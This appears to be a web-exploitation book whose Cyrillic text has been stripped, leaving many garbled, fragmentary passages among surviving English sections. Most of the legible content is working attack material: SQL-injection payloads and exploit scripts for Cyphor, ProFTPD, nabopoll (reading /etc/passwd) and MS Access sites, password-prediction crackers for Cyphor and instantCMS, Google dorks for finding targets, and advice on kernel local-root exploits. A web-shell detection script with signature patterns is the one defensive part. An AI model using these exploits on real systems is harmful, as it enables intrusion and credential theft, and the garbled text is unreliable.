1. Reconnaissance: what runs on the server (the application and its version, the web server, the operating system).
2. A web hole: SQL injection, XSS, file inclusion, a file upload.
3. A foothold: FTP, or a web shell; from a PHP script the attacker runs commands with system(), passthru() or shell_exec(), or uploads a Perl or Python back connect.
4. A local account: the web server's user first, then other users' passwords from the database, from configuration files, or by brute force.
5. Root, through a local exploit or a trick such as the fake su.
6. Cleaning up, and a way back in.

Each step has its own chapter above; the point of the list is that none of them needs a sophisticated attacker. An out-of-date CMS, a script that trusts its parameters, a world-writable /tmp with a C compiler and an old kernel are all it takes.
.
,
( -),
ftp- ProFTPD.
1.3.1 1.3.2 2,
SQL-. ( )
ftp- ( 21),
:
USER myuser
myuser .
:
PASS password
password myuser.
, FTP (
, , ).
% SQL-,
users () ,
1:
USER %') and 1-2 union select l.l.uid.gid.homedir.shell from users: -PASS: 1
.
http://downloads.securityfocus.com/vul nerabi1i ti es/exploi ts/33722.pi
:
./exploit.pl ftp.example.com
127
ftp.example.com ( ftp
FTP). ,
:
[*] Connected ftp.example.com
[!] Please Choose A Command Execute On ftp.exarnp1e.ccr :
[1] Show Files
[2] Delete File
[3] Rename File or Dir
[4] Create A Directory
[5] Exit
Enter Number Of Command Here ->
Another example, from 2005: Linux-ftpd-ssl 0.17 (MKD/CWD) Remote Root Exploit, against an FTP daemon shipped with several Linux distributions; a buffer overflow reachable through the MKD and CWD commands in a daemon that runs as root. An old one, but old servers exist.

A different kind of hole, from 2008: Sun's OpenSolaris LiveCD came with the user jack, password jack, and the root password opensolaris; a machine installed from it, given an address by DHCP and put on the network without changing the passwords could be entered by anyone who knew the defaults. Default passwords are a hole like any other.

Detecting web shells

From the administrator's side: if an attacker has been through one of the holes of chapters 05 to 08, what he leaves behind is a web shell, a PHP script (r57shell, c99sh, the void.ru shells and their many relatives) that gives him a file manager and command execution through the browser. A nightly script that looks for them catches most of them. The script check.sh below takes a list of files from the web tree (one path per line, relative to /usr, as produced by find), examines every .php file for the signatures of the known shells (r57shell, and the gzinflate and base64_decode calls that packed shells use to hide themselves), checks the index files defacements replace, writes its findings to /var/log/check.log and mails them to the administrator. It runs from cron every night and costs nothing. Shells that are not in its list are found by what they do: look for eval(), system() and passthru() with an argument taken from the request, for create_function() on decoded strings, and for scripts that are not part of the site's software (cgitelnet, nfm and the like).
    #!/bin/bash
    # check.sh: look for web shells among the files listed in $1 (one path per line,
    # relative to /usr, as produced by "find . -type f" in /usr) and report them.
    if [ $# -lt 1 ]; then
        echo "usage: $0 file_name"
        exit 0
    fi

    RESULT=""
    LOG=/var/log/check.log

    # PHP files: search each one for the signatures of known shells
    for F in $(grep "\.php$" "$1"); do
        F1="/usr/$F"
        if [ -f "$F1" ]; then
            RE=$(grep -c r57shell "$F1")
            if [ "$RE" != "0" ]; then
                RESULT="$RESULT\nFIND possible hack file $F1 (r57shell)"
            fi
            RE=$(grep -c gzinflate "$F1")
            if [ "$RE" != "0" ]; then
                RESULT="$RESULT\nFIND possible hack file $F1 (gzinflate)"
            fi
        fi
    done

    # index files: defacements and injected loaders replace or edit them, so check
    # them for the decode-and-execute pattern packed shells use
    for F in $(grep "index\.html$\|index\.php$\|index\.htm$" "$1"); do
        F1="/usr/$F"
        if [ -f "$F1" ]; then
            RE=$(grep -c "base64_decode\|create_function" "$F1")
            if [ "$RE" != "0" ]; then
                RESULT="$RESULT\nFIND possible hack file $F1 (base64_decode/create_function)"
            fi
        fi
    done

    if [ "$RESULT" != "" ]; then
        echo -e "$(date)$RESULT" >> "$LOG"
        echo -e "$(date)$RESULT" | mail -c sysadm@mysite.net -s "Red Alert: possible hack file on mysite.net" admin@mysite.net
    else
        echo -e "$(date) didn't find intruder" >> "$LOG"
    fi
IT -
| ,
. ,
,
. , , ,
,
. , .
,
.
.
, , ,
(!).
1990-
,
()
. ( , )
,
( A B F),
(subsidiary) .
,
*,
.
,
( ).
ABF * (
, ,
132
13. -
) -
,
.
. ,
.
(
), .
, .
.
3- LINC . ,
, 1970-.
LINC II,
, ,
.
, LINC II,
...
LINC II , ,
, .
, ,
.
,
:
. ,
,
.
.
, ,
- .
, , .
.
: , (
) , , ABF,
UNISYS.
. (, , )
, , ,
.
, , ,
, ,
. , ,
. U N ISY S-U N ISY S,
ICQ
133
. , U N ISY SUNIMAS ( , , )
, ! .
,
.
, (
)
, ,
,
. ? , ,
,
.
?
,
, , ,
IT- ,
.
.
.
ICQ
2007 , . ,
, ( ),
. , , ,
. ,
.
: , ?
,
, .
. ,
, ,
. ,
, , jimm.
, -
. , jimm Java .
(
jimm, .
( : : -, /
; -,
<| 1?! ; -,
( , ) ,
, , .
,
, , , .
.
,
jimm
, , . , ,
,
- .
, ,
. ? :
ICQ -.
, .
, ,
.
,
, ,
. .
, .,
. -
ICQ, :
.
, , .
.
( !;
I C Q { , ). ,
,
. .
,
274 , ,
.
,
. , ,
, ,
, ,
, ! - ,
ICQ- .
, , , .
, .
.
, , ? ,
, . .
,
,
,
.
, 2005 .
, ,
,
Linux.
,
.
, , ,
/tmp, , , ,
. , /tmp
.
Windows, .
, ,
- 1-.
, , ,
- - Perl.
: ,
, .
- .
, ,
. , , -,
.
, -.
- ,
, .
,
, ,
.
, Google, .
,
,
-,
. Google
, .
, /tmp ,
. , - ,
-,
. .
, Linux Unix- ,
, , ,
.
, ?
,
, -,
, .
- , ,
90-, .
, ,
-,
,
. ,
, -
Google . -
.
, ,
.
To get root on such a box, look at the kernel version and at the suid binaries. Old kernels (the 2.4.x series and the early 2.6 kernels) have public local root exploits; a query such as "linux kernel 2.4 local root exploit" in Google finds them, and on a matching kernel one of them turns the shell of the web server into a root shell.
, ,
, , ,
- .
. ,
,
, ,
.
.
, ,
,
,
- , .
, ,
, - .
,
,
. ,
.
Basic *nix commands

ls <dir>                  list the contents of a directory (the current one if <dir> is omitted)
pwd                       print the current working directory
cd <dir>                  change to the directory <dir>
cat <file>                print the contents of a file
id                        the uid, gid and groups of the current user
whoami                    the name of the current user
uptime                    how long the system has been running, and its load
netstat                   network connections and listening ports
man <command>             the manual page of a *nix command
<command> --help          the short built-in help of a command
users                     the users currently logged in
who                       who is logged in, and from where
w                         who is logged in and what they are doing
ps                        the running processes (ps aux: all processes of all users)
kill <PID>                terminate the process with the given <PID>
finger <login>            information about a user
last                      the login history
last <login>              the login history of one user
cp <file> <newlocation>   copy a file
mv <file> <newlocation>   move or rename a file
rm <file>                 delete a file
mkdir <dir>               create a directory
rmdir <dir>               remove an empty directory
chmod <mode> <file>       change the permissions of a file
vi <file>                 edit a file in vi
vim <file>                edit a file in vim
cc <file> -o <outfile>    compile a C source file
gcc <file> -o <outfile>   compile with the GNU C compiler
wget -O <outfile> <url>   download a file
curl -o <outfile> <url>   download a file
SQL injection in show.php of Cyphor

First create a forum through the administrative page cyphor/admin/forum-create.php (Fig. 2.1):
http://localhost/webexploitation_package_02/cyphor/admin/forum-create.php
Fill in the form as in Fig. 2.2 and press Create Forum.

The id parameter of show.php is injectable. The request (Fig. 2.3)
http://localhost/webexploitation_package_02/cyphor/show.php?fid=1&id=-1 union select 1,2,3,4,5,nick,password,8,id,10 from cyphor_users where id=1
reads the columns id, nick and password of the cyphor_users table for the user with id=1 (the administrator); the non-existent message id makes the original query return nothing, so only the injected row is displayed.
Fig. 2.2. Creating a test forum in Cyphor (screenshot of the forum-create.php form: Test Forum / My test forum, Create Forum)
Fig. 2.3. show.php with the injected query: the User Info column shows the nick (alexl) and the crypt() hash ad4KRH.YJ7j9A (screenshot)
Next, which tables does the database have? In MySQL 5 the information_schema database lists them (tables and columns), so the same injection with
union select 1,2,3,4,5,6,group_concat(table_name),8,9,10 from information_schema.tables
prints the table names in the output column.

The fid parameter of show.php is injectable as well, but its query has a different (smaller) number of columns, so the payload has to be adapted. If fid is given a value that selects no forum (fid=-1), the messages of the forum are replaced by the rows of the union; the query turns out to have four columns:
fid=-1 union select 1,2,3,4 from cyphor_users
(Fig. 2.4).

Fig. 2.4. show.php with the four-column union in fid (screenshot)
In the output (Fig. 2.4) the numbers of the union show where show.php prints each column: the fourth column is displayed as the text of a message (so put a marker string there, 'msg_test'), and the second is displayed prominently enough to carry what we want to read. Combine nick and hash in it with concat:
http://localhost/webexploitation_package_02/cyphor/show.php?fid=-1 union select 1,concat(nick,0x3a,password),3,'msg_test' from cyphor_users
The result is in Fig. 2.5: every user of the forum with the crypt() hash of the password, separated by a colon (0x3a).
Fig. 2.5. The nick:hash pairs (admin:ad4KRH.YJ7j9A) displayed as messages of the forum (screenshot; the location bar shows the concat payload URL-encoded)
Cyphor passwords

Cyphor stores passwords hashed with crypt(), and the hash is what the injection above returns. Cracking a DES crypt() hash of an arbitrary 8-character password by brute force is slow (roughly 1000 hashes a second on the hardware of the time). Is there a shortcut? There is. On registration (register.php) the password is generated by random_password (globals.php): 8 characters produced by a generator that is seeded with the current time, i.e. time(), the Unix timestamp (seconds since 1 January 1970). The registration time of every user is kept in the cyphor_users table (column signup_date) and can be read through the same SQL injection, Fig. 3.1.
Fig. 3.1. Reading signup_date of the users through the injection (screenshot)
signup_date is the time of registration, and register.php calls random_password with signup_date + 1 or thereabouts (the two time() calls are not simultaneous). So, knowing signup_date and the hash, one takes the candidate seeds signup_date, signup_date+1, ..., regenerates the password with random_password and compares crypt() of the candidate with the stored hash. That is what crack-pass.php does, Fig. 3.2.
<?php
# users (nick:hash:signup_date) read through the SQL injection:
# admin:ad4KRH.YJ7j9A:1183265359
# alice:al.JF7HbXCbK.:1276826876
require_once "globals.php";    // Cyphor's own random_password() lives here

$time0     = 1276826876;        // signup_date of the target account
$user_nick = "alice";
$hash      = "al.JF7HbXCbK.";   // crypt() hash from cyphor_users (salt = first two letters of the lowercased nick)

// Walk forward from signup_date until crypt() of the regenerated password matches
// the stored hash. The bound of 3600 seeds is a choice of this listing.
for ($i = 0; $i < 3600; $i++) {
    $password = random_password($time0);
    $p = crypt($password, strtolower($user_nick));
    if ($p == $hash) {
        printf("Password for user %s - %s\n", $user_nick, $password);
        exit();
    }
    $time0 = $time0 + 1;
}
?>

Fig. 3.2. crack-pass.php
crack-pass.php recovers the password of alice in this way (Fig. 3.3). The function random_password() is taken from the cyphor distribution itself (globals.php; see its README.txt).
Fig. 3.3. crack-pass.php in action (screenshot)
When the injection does not yield signup_date, the same loop can be run over a wider window of timestamps (hours or days around the probable registration time); brute-pass.php does that, Fig. 3.4:

<?php
# users:
# alice:al.JF7HbXCbK.:1276826876

Fig. 3.4. brute-pass.php (beginning of the listing)
The run for the user alice is shown in Fig. 3.5.

Fig. 3.5. brute-pass.php (Konsole screenshot)
. ,
, ,
, (
).
,
, , .
5 ,
2 .
The matrix, :
-
. ,
instantCMS.
, ,
8.
, ,
-.
A request can also be typed by hand over Telnet (port 80):
telnet 127.0.0.1 80
. .. -
.
,
.
crack-pass.php.
, PI 1
, ,
( ,
-,
admin, - ;
, ;
, John The Ripper).
, ,
.
. ( )
, SQL-, UPDATE,
3 ().
.
, !
.
Once in, the usual reconnaissance commands apply: uname -a, id, pwd, who, ps and so on (Cyphor normally lives on *nix hosts).

Public SQL injection exploit for Cyphor

A public exploit for this injection is published at
http://www.securiteam.com/unixfocus/6P00F1FEKC.html
Save it as cyphor019.pl. To make it work against the test installation two things had to be changed: the injected query in $url, and the table name, users, which in this version of Cyphor is cyphor_users. The modified $url is in the listing below.
#!/usr/bin/env perl
#//----------------------------------------------------------------#
#// Cyphor Forum SQL Injection Exploit .. By HACKERS PAL
#// Greets For Devil-00 - Abducter - Almaster
#// http://WwW.S0Q0R.NeT
#//----------------------------------------------------------------#
use LWP::Simple;
print "\n#--------------------------------------------------#";
print "\n# Cyphor Forum Exploit By : HACKERS PAL            #";
print "\n# Http://WwW.SoQoR.NeT                             #";
if(!$ARGV[0]||!$ARGV[1]) {
    print "\n# -- Usage:                                        #";
    print "\n# -- perl $0 [Full-Path] 1                        #";
    print "\n# -- Example:                                      #";
    print "\n# -- perl $0 http://www.cynox.ch/cyphor/forum/ 1   #";
    print "\n# Greets To Devil-00 - Abducter - almastar         #";
    print "\n#--------------------------------------------------#\n";
    exit(0);
}
else {
    print "\n#--------------------------------------------------#\n";
    $web=$ARGV[0];
    $id=$ARGV[1];
    # Injected query. The copy of the listing breaks off after "show.php?fid-2&id";
    # the payload below is the one used against show.php in the previous section
    # (nick and hash of the user $id from cyphor_users), URL-encoded for LWP.
    $url = "show.php?fid=2&id=-1%20union%20select%201,2,3,4,5,nick,password,8,id,10%20from%20cyphor_users%20where%20id=$id";
    $site="$web/$url";
    $page = get($site) || die "[-] Unable to retrieve: $!";
    print "\n[+] Connected to: $ARGV[0]\n";
    print "[+] User ID is : $id ";
    $page =~ m/<span class=bigh>(.*?)<\/span>/
        && print "\n[+] User Name is: $1\n";
    print "\n[-] Unable to retrieve User Name\n" if (!$1);
    $page =~ m/<span class=message>(.*?)<\/span>/
        && print "[+] Hash of password is: $1\n";
    print "[-] Unable to retrieve hash of password\n" if (!$1);
}
print "\n\nGreets From HACKERS PAL To you :)\nWwW.SoQoR.NeT . . . You Are Welcome\n\n";
#finished
The script pulls the nick out of the <span class=bigh> ... </span> element of the returned HTML and the hash out of <span class=message> ... </span>, which is where show.php prints the second and the seventh column of the injected row. Run it as
perl cyphor019.pl http://localhost/webexploitation_package_02/cyphor/ 1
where the last argument is the id of the user (1 is the administrator). The result is shown in Fig. 4.1.

Fig. 4.1. The SQL injection exploit for Cyphor (screenshot)
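The whole path of this and the previous section in one place, as an added Python example (it is not code from the book nor from the cyphor019.pl exploit): it builds the two injected show.php requests of the chapter and parses the result the way cyphor019.pl does with its two regular expressions, plus the nick:hash messages of the concat variant. The fetch function is passed in, so the parsing runs offline on a constructed page; BASE is the test path used throughout the chapter, and the sample HTML fragments are constructed for this example.

```python
import re
from urllib.parse import quote

# Path of the test installation used throughout the chapter
BASE = "http://localhost/webexploitation_package_02/cyphor"


def user_payload(uid):
    """show.php?id= injection from the chapter: nick and password hash of the
    cyphor_users row with the given id land in the page's user-info columns."""
    sql = ("-1 union select 1,2,3,4,5,nick,password,8,id,10 "
           "from cyphor_users where id=%d" % int(uid))
    return "%s/show.php?fid=1&id=%s" % (BASE, quote(sql, safe="=,()"))


def concat_payload():
    """show.php?fid= injection: every nick:hash pair (0x3a is ':') is shown as a
    message of the non-existent forum -1; 'msg_test' fills the message-text column."""
    sql = "-1 union select 1,concat(nick,0x3a,password),3,'msg_test' from cyphor_users"
    return "%s/show.php?fid=%s" % (BASE, quote(sql, safe="=,()'"))


def parse_user_page(html):
    """What cyphor019.pl does: the nick is printed in <span class=bigh>, the
    crypt() hash in <span class=message>. Returns (nick, hash), None where missing."""
    nick = re.search(r"<span class=bigh>(.*?)</span>", html, re.S)
    pw = re.search(r"<span class=message>(.*?)</span>", html, re.S)
    return (nick.group(1) if nick else None, pw.group(1) if pw else None)


def parse_concat_page(html):
    """Pull nick:hash pairs out of the page returned for concat_payload().
    A traditional DES crypt() hash is exactly 13 characters of [./0-9A-Za-z]."""
    return re.findall(r"([A-Za-z0-9_]+):([./0-9A-Za-z]{13})(?![./0-9A-Za-z])", html)


def dump_user(fetch, uid):
    """fetch(url) -> html, e.g. lambda u: urllib.request.urlopen(u).read().decode()"""
    return parse_user_page(fetch(user_payload(uid)))


def dump_all_users(fetch):
    return parse_concat_page(fetch(concat_payload()))


# Constructed fragments of what show.php returns, for an offline run
SAMPLE_USER_PAGE = ("<td><span class=bigh>admin</span></td>"
                    "<td><span class=message>ad4KRH.YJ7j9A</span></td>")
SAMPLE_CONCAT_PAGE = ("<td>admin:ad4KRH.YJ7j9A</td>\n"
                      "<td>alice:al.JF7HbXCbK.</td>")

if __name__ == "__main__":
    print(user_payload(1))
    print(dump_user(lambda url: SAMPLE_USER_PAGE, 1))
    print(dump_all_users(lambda url: SAMPLE_CONCAT_PAGE))
```

Against a live installation, pass `lambda u: urllib.request.urlopen(u).read().decode()` as fetch; the two parsers are deliberately as loose as the Perl regexes, so a page that happens to contain another 13-character token will also be reported.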
SQL injection: MS SQL Jet

The same approach works for ASP sites backed by Microsoft Access (the Jet engine); only the error messages and the dialect differ.

1. Find targets with Google:
site:.org inurl:.asp?id=
site:.com inurl:.aspx?*
site:.co.uk inurl:.asp?cid=
and similar queries.

2. Suppose http://www.site.com has the page
http://www.site.com/en/pressread.asp?id=563
Add a quote to the URL to see whether the parameter is checked:
http://www.site.com/en/pressread.asp?id=563'
The server answers:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'id=563''.
/en/includes/configdb.asp, line 23
So the value goes into the query unescaped. Check that a condition can be appended, with AND 1=1:
http://www.site.com/en/pressread.asp?id=563+AND+1=1#
(in this ASP/Jet setup the # at the end plays the part that -- or /* play in other DBMSs). The page is returned unchanged; with a false condition (AND 1=2) no record is found and ASP reports:
ADODB.Field error '800a0bcd'
Either BOF or EOF is True, or the current record has been deleted.
Requested operation requires a current record.
/en/pressread.asp, line 44
To find the number of columns use ORDER BY. ORDER BY 10, say, returns:
Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database engine does not recognize '10' as a valid field name or expression.
/en/includes/configdb.asp, line 23
so there are fewer than 10 columns. Decrease the number until the error disappears; here that happens at 7. Now try a UNION:
http://www.site.com/en/pressread.asp?id=563+AND+1=0+UNION+ALL+SELECT+1,2,3,4,5,6,7#
Jet requires a FROM clause in every SELECT:
Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC Microsoft Access Driver] Query input must contain at least one table or query.
/en/includes/configdb.asp, line 23
so a table name has to be guessed:
http://www.site.com/en/pressread.asp?id=563+AND+1=0+UNION+ALL+SELECT+1,2,3,4,5,6,7+FROM+user#
A name that does not exist gives:
Microsoft OLE DB Provider for ODBC Drivers error '80040e37'
[Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database engine cannot find the input table or query 'user'. Make sure it exists and that its name is spelled correctly.
/en/includes/configdb.asp, line 23
Common names to try: user, users, admin, login, news, sysobjects, customers. Suppose admin exists; then the request
http://www.site.com/en/pressread.asp?id=563+AND+1=0+UNION+ALL+SELECT+1,2,3,4,5,6,7+from+admin#
returns the page with the numbers 1 to 7 printed where the selected columns go, and column names can be substituted for them.

3. The column names are then found with GROUP BY ... HAVING.
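Step 2 of the procedure above as an added Python example (not code from the book): the column count is found by walking ORDER BY n until Jet rejects the number, then table names are tried with UNION ALL SELECT ... FROM name until the 'cannot find the input table' error stops. The id parameter is numeric (the error shows it unquoted in 'id=563'), so nothing has to be commented out after the injected text and the # of the text is not sent. Because there is no site.com to talk to, fetch is a function argument and FakeJetPage is a constructed stand-in that answers with the error texts quoted above; against a live target pass a real HTTP fetch.

```python
import re

# Error texts an ASP page on a Jet (MS Access) backend prints, as shown in the text
ERR_BAD_FIELD = ("[Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database "
                 "engine does not recognize '%s' as a valid field name or expression.")
ERR_NO_TABLE = ("[Microsoft][ODBC Microsoft Access Driver] Query input must contain "
                "at least one table or query.")
ERR_NO_SUCH_TABLE = ("[Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database "
                     "engine cannot find the input table or query '%s'.")

TABLE_NAMES = ("user", "users", "admin", "login", "news", "sysobjects", "customers")


class FakeJetPage:
    """Constructed stand-in for /en/pressread.asp?id=...: a query over `ncols`
    columns, with the listed tables existing, answered the way the text shows."""

    def __init__(self, ncols, tables):
        self.ncols, self.tables = ncols, {t.lower() for t in tables}

    def get(self, url):
        q = url.split("?id=", 1)[1]
        m = re.search(r"ORDER\+BY\+(\d+)$", q)
        if m:
            n = int(m.group(1))
            return "<html>press release 563</html>" if n <= self.ncols else ERR_BAD_FIELD % n
        m = re.search(r"UNION\+ALL\+SELECT\+([\d,]+)(?:\+FROM\+(\w+))?$", q)
        if m:
            if m.group(2) is None:
                return ERR_NO_TABLE
            if m.group(2).lower() not in self.tables:
                return ERR_NO_SUCH_TABLE % m.group(2)
            return "<html>%s</html>" % m.group(1).replace(",", " ")
        return "<html>press release 563</html>"


def column_count(fetch, base, limit=30):
    """ORDER BY 1, 2, ... until Jet rejects the number; the last accepted one is
    the column count. base is the URL up to and including the id value,
    e.g. http://www.site.com/en/pressread.asp?id=563"""
    for n in range(1, limit + 1):
        if "valid field name" in fetch("%s+ORDER+BY+%d" % (base, n)):
            return n - 1
    return None


def guess_table(fetch, base, ncols, candidates=TABLE_NAMES):
    """UNION ALL SELECT 1,...,n FROM <name> for each candidate. Jet needs a FROM,
    and a name it cannot find produces the 'cannot find the input table' error.
    Returns (table, page) for the first name that is accepted, else None."""
    cols = ",".join(str(i) for i in range(1, ncols + 1))
    for t in candidates:
        body = fetch("%s+AND+1=0+UNION+ALL+SELECT+%s+FROM+%s" % (base, cols, t))
        if "cannot find the input table" not in body and "Query input must" not in body:
            return t, body
    return None


if __name__ == "__main__":
    page = FakeJetPage(7, ["admin", "news"])
    url = "http://www.site.com/en/pressread.asp?id=563"
    n = column_count(page.get, url)
    print(n, guess_table(page.get, url, n))
```

The returned page of guess_table shows the digits 1..7 in the positions where the page prints the columns, which is what the text uses next to decide which column to replace with a column name.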
nabopoll.php

The blind SQL injection in nabopoll was covered in chapter 06. The public exploit for it needed some changes to work against the test installation; the modified version, which reads /etc/passwd byte by byte through the injection, is listed below:
<?php
# Nabopoll Blind SQL Injection Exploit
# Download: www.nabocorp.com/nabopoll/
# coded by s0cratex
# Contact: s0cratex@hotmail.com
# July 1, 2010 - modified by Uri
error_reporting(0);
ini_set("max_execution_time", 0);

$srv  = "localhost";
$path = "/webexploitation_package_02/nabopoll";
$port = 80;
$survey = "1"; // you can verify the number entering in the site and viewing the results...
// Fragment of the HTML that appears only when the injected condition is true.
// The value used in the book is not legible in this copy; set it for the target page.
$marker = "TRUE_PAGE_MARKER";

echo "Nabopoll SQL Injection -- Modified Exploit\n";
echo "------------------------------------------\n\n";
echo " -- /etc/passwd: \n";

// Asks the server whether ASCII(byte $j of /etc/passwd) $op $x holds.
// 0x2f6574632f706173737764 is "/etc/passwd" in hex, so no quotes are needed.
function oracle($srv, $port, $path, $survey, $marker, $j, $op, $x) {
    $xpl = "/result.php?surv=".$survey."/**/AND/**/1=(SELECT/**/(IF((ASCII(SUBSTRING(load_file("
         . "0x2f6574632f706173737764),".$j.",1))".$op.$x."),1,0)))/*";
    $cnx = fsockopen($srv, $port);
    if (!$cnx) die("\n Unable to connect\n");
    fputs($cnx, "GET ".$path.$xpl." HTTP/1.0\r\nHost: ".$srv."\r\n\r\n");
    $bingo = false;
    while (!feof($cnx)) {
        if (strstr(fgets($cnx, 1024), $marker)) { $bingo = true; break; }
    }
    fclose($cnx);
    return $bingo;
}

$j = 1; $user = "";
// Byte by byte until the NUL that SUBSTRING() yields past the end of the file
while (!strstr($user, chr(0))) {
    // Binary search of the byte value: invariant value > $minx and value <= $maxx
    $minx = -1; $maxx = 255;
    while ($maxx - $minx > 1) {
        $x = intval(($maxx + $minx) / 2);
        if (oracle($srv, $port, $path, $survey, $marker, $j, ">", $x)) $minx = $x;
        else $maxx = $x;
    }
    $user .= chr($maxx);
    echo chr($maxx);
    $j++;
}
echo "\n";
?>

The original exploit required only small changes (the server, the path and the request in $xpl) to work against the test installation; each byte costs eight requests, one per bit.
Blind SQL injection in MS Access

Templates (the underscores stand for the table, column or character to test, X for a number):

Does a table exist?
[...] AND (SELECT TOP 1 1 FROM _)
[...] AND (SELECT TOP 1 1 FROM users)

Does a column exist?
[...] AND (SELECT TOP 1 _ FROM _)
[...] AND (SELECT TOP 1 name FROM users)

Length of a value:
[...] AND IIF((SELECT TOP 1 LEN(_) FROM _) = X, 1, 0)
[...] AND IIF((SELECT TOP 1 LEN(name) FROM users) = 8, 1, 0)

One character of a value:
[...] AND IIF((SELECT TOP 1 MID(_, X, 1) FROM _) = CHR(_), 1, 0)
[...] AND IIF((SELECT TOP 1 MID(name, 1, 1) FROM users) = CHR(65), 1, 0)
instantCMS

The following was found by The matrix and published at
https://forum.antichat.ru/showpost.php?p=2138088&postcount=23
with the accompanying files at
http://ifolder.ru/17669676
http://webfile.ru/4490132
It concerns the password reminder of the registration component.
Where is the problem? In /components/registration/frontend.php:

$sql = "SELECT * FROM cms_users WHERE email = '$email' LIMIT 1";
$result = $inDB->query($sql);
if ($inDB->num_rows($result) > 0) {
    $usr = $inDB->fetch_assoc($result);
    $newpassword = substr(md5(microtime()), 0, 6);
    $inDB->query("UPDATE cms_users SET password = '".md5($newpassword)."' WHERE id = ".$usr['id']);
    $mail_message  = $_LANG['HELLO'].', '.$usr['nickname'].'!'."\n\n";
    $mail_message .= $_LANG['REMINDER_TEXT'].' '.$inConf->sitename.'.'."\n\n";
    $mail_message .= $_LANG['YOUR_PASS_IS_MD5']."\n";
    $mail_message .= $_LANG['YOUR_PASS_IS_MD5_TEXT']."\n\n";
    $mail_message .= '########## '.$_LANG['YOUR_LOGIN'].': '.$usr['login']."\n";
    $mail_message .= '########## '.$_LANG['YOUR_NEW_PASS'].': '.$newpassword."\n\n";
    $mail_message .= $_LANG['YOU_CAN_CHANGE_PASS']."\n";
    $mail_message .= $_LANG['IN_CONFIG_PROFILE'].': '.cmsUser::getProfileURL($usr['login'])."\n\n";
    $mail_message .= $_LANG['SIGNATURE'].', '.$inConf->sitename.' ('.HOST.').'."\n";
    $mail_message .= date('d-m-Y (H:i)');
    $inCore->mailText($email, $inConf->sitename.' - '.$_LANG['REMINDER_PASS'], $mail_message);
}
What is wrong here?
1. The new password is the first 6 characters of an md5 hex digest, so it consists of [0-9a-f] only.
2. The password is derived from microtime(), and the value of microtime() is predictable.

microtime() returns the current Unix timestamp with microseconds (it is built on gettimeofday()). Called without arguments it returns the string "msec sec", where sec is the number of seconds since the Unix Epoch (1 January 1970, 00:00:00 GMT) and msec the fraction of the second, for example:
0.30001200 1273589840
The seconds part is no secret: the HTTP response to the password-reminder request carries the server's clock in the Date header,
Date: 11 May 2010 20:39:23 GMT
which converts directly to seconds since 1970-01-01 00:00:00 GMT (the header is in GMT, so the time zone of the server does not matter). Only the microseconds remain unknown, and the last two digits of the fraction printed by microtime() are always 00, so the new password is one of
substr(md5("0.xxxxxx00 1273589840"), 0, 6)
for xxxxxx from 000000 to 999999: at most a million candidates, each just one md5 computation away.
1512
1 . .
| -.
. ,
11 : 1000000/11 90.909
. , ,
.
,
100-,
. ,
.
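The candidate space described above, as an added Python example (not code from the book or from instantCMS): it reproduces the string microtime() produces, derives the 6-character password exactly as frontend.php does, and, given md5(password) as stored in cms_users (the value an SQL injection would yield) and the second from the Date header, enumerates the million microsecond values of that second. A window of several seconds is handled too, for a Date header that is off by a little. The hash-and-second pair in the main block is constructed for this example from the microtime() value shown in the text.

```python
import hashlib
import secrets


def md5_hex(s):
    return hashlib.md5(s.encode()).hexdigest()


def microtime_string(sec, usec):
    """PHP's microtime() with no argument returns "msec sec", e.g. "0.30001200 1273589840":
    the fraction is printed with 8 decimals, so the microseconds are followed by "00"."""
    return "0.%06d00 %d" % (usec, sec)


def instantcms_password(sec, usec):
    """substr(md5(microtime()), 0, 6) as in components/registration/frontend.php."""
    return md5_hex(microtime_string(sec, usec))[:6]


def recover_password(password_md5, sec):
    """password_md5: md5(new password) as stored in cms_users; sec: the second in
    which the reset ran, taken from the HTTP Date header. At most 1,000,000
    candidates; returns (password, usec) or None."""
    for usec in range(1000000):
        pw = instantcms_password(sec, usec)
        if md5_hex(pw) == password_md5:
            return pw, usec
    return None


def recover_password_window(password_md5, first_sec, last_sec):
    """The same when the Date header leaves a few seconds of uncertainty."""
    for sec in range(first_sec, last_sec + 1):
        hit = recover_password(password_md5, sec)
        if hit is not None:
            return hit[0], sec, hit[1]
    return None


def safe_password(nbytes=8):
    """What the reminder should do instead: draw the password from the OS CSPRNG
    (random_bytes()/bin2hex() in PHP 7), not from the clock."""
    return secrets.token_hex(nbytes)


if __name__ == "__main__":
    # Constructed example: a reset processed at the microtime() value the text shows
    sec, usec = 1273589840, 300012
    stored = md5_hex(instantcms_password(sec, usec))
    print(recover_password(stored, sec))
```

Without the stored hash the same enumeration turns into a million login attempts, which is why the next section pairs this weakness with an SQL injection that reads the md5 from cms_users.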
SQL-
() ,
SQL-.
, ,
(, md5 ). ,
, .
, ,
,
/etc/passwd. , . ,
( )
, ,
.
, ,
.
, ,
, , .
/etc/passwd
. , ,
(, ,
/etc/passwd ,
, ).
, ,
SQL-,
.
find_in_set(substr, strlist)

MySQL's find_in_set() returns the position of a string in a comma-separated list, and 0 if the string is not in the list. For example, the character 'c' in the list 'a,b,c,d,e':
mysql> SELECT FIND_IN_SET('c','a,b,c,d,e');
 -> 3
Take as the list the alphabet of an md5 hash:
0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f
Then a single request gives the position of one character of the hash in that list:
select find_in_set((substring((select password from users limit 0,1),1,1)),'0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f');
For 'a' the result is 11. The result is a number between 1 and 16 that can be fed straight into the numeric parameter of a page, say the id of a news item:
news.php?id=find_in_set(substring((select password from users limit 0,1),1,1),'0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f')
The site then shows news item number N, and N identifies the character: one request per character instead of a yes/no question per candidate.
The conditions for this to work:
1. The alphabet of the value must be known (here the 16 hex digits of an md5 hash).
2. The number returned by find_in_set() must influence what the page displays.
3. The page must have items with small consecutive numbers, so that each possible result maps to a visibly different page.
Cost: 32+16 requests with the 15-element list.

Instead of find_in_set() one can use INSTR(), LOCATE(), ASCII() or ORD(); ASCII() and ORD() exist in every version of MySQL.

Advantages:
far fewer requests than a character-by-character comparison;
nothing but the numeric parameter is needed.
Disadvantages:
the page must display something that depends on a number;
